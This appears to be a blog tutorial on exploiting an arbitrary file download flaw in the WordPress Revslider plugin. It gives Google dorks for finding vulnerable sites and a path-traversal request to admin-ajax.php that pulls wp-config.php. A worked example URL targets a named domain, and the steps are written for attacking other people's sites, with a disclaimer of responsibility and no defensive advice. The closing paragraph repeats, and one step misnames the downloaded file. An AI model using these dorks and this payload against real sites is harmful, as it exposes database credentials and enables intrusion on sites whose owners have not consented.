Exploit Wordpress Revslider Arbritary File Download Vulnerability
image: Tutorial Wordpress
Cinezone.Newsartstory - How are you all? This time I will discuss Exploit Wordpress Revslider Arbritary File Download in this exploit you can download important files on the web server especially websites that use Wordpress cms but not all websites that use cms are vulnerable to this exploit.
According to the results I got from Exploit DB this exploit was discovered by Claudio Viviani in 2014, he is the owner of the blog https://www.homelab.it/ which contains about security.Dork : inurl:wp-content/plugins/revslider/inurl:revsliderinurl:revslider_admin.phpinurl:revslider_front.phpinurl:plugins/revslider/intext:Powered by Revsliderintitle:"Index Of/revslider"intitle:"Index Of/wp-content/themes/revslider"intitle:"Index Of /wp-content/plugins/revslider"intitle:"Index Of/admin/revslider"intitle:"Index Of/fr/revslider"intitle:"Index Of/en/revslider"intitle:"Index Of/us/revslider"intitle:"Index Of/ar/revslider"intitle:"Index Of/es/revslider"intitle:"Index Of/de/rev slider" Exploit :
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Step :
1. Dorking with the dork that has been provided.
2. Here I already have a vulnerable target, just give it an exploit, for example: http://site.co.id/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
3. And if successful admin-ajax.php is downloaded then open it with a text editor.
That's all the Exploit Wordpress Revslider Arbitary File Download Vulnerability that I shared, hopefully it is useful and I am not responsible for what you do, thank you.
That's all the Exploit Wordpress Revslider Arbitary File Download Vulnerability that I shared, hopefully it is useful and I am not responsible for what you do, thank you.
Post a Comment for "Exploit Wordpress Revslider Arbritary File Download Vulnerability"